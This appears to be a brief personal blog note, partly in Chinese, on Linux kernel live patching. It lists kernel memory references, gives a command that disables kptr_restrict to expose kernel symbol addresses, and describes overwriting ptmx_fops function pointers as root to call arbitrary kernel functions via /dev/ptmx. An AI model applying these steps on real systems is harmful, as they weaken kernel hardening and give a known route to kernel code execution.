980 views
# Notes on kernel live patch ###### tags: `blog` ## basis - /dev/mem - /dev/kmem - /proc/iomem - struct mm_struct init_mm - swapper_pg_dir - head.S - https://www2.samsungknox.com/en/blog/real-time-kernel-protection-rkp - 内核起始地址,页表地址 - http://stackoverflow.com/questions/14460752/linux-kernel-arm-translation-table-base-ttb0-and-ttb1 - http://stackoverflow.com/questions/16648112/arm-linux-kernel-page-table - DDI0333H_arm1176jzs_r0p7_trm.pdf ## /proc/kallsyms 如果看不到地址,先: ```shell= echo 0 > /proc/sys/kernel/kptr_restrict ``` 符号含义(大写表示是导出的): b: 符号在未初始化数据区(BSS) c: 普通符号,是未初始化区域 d: 符号在初始化数据区 g: 符号针对小object,在初始化数据区 i: 非直接引用其他符号的符号 n: 调试符号 r: 符号在只读数据区 s: 符号针对小object,在未初始化数据区 t: 符号在代码段 u: 符号未定义 ## ptmx_fops symbol `ptmx_fops` (coresponding to `/dev/ptmx`) is defined on source code `drivers/tty/pty.c`, which is a global lying in BSS segment, means that we can overwrite it via root permission safely. `ptmx_fops` 是个 `file_operations` 结构体,重写它的某些函数指针(如`fsync`)令其指向某些内核函数,然后通过 `/dev/ptmx` 即可调用某些内核函数(`open /dev/ptmx` 拿到 `fd`,然后 `fsync(fd)`~)。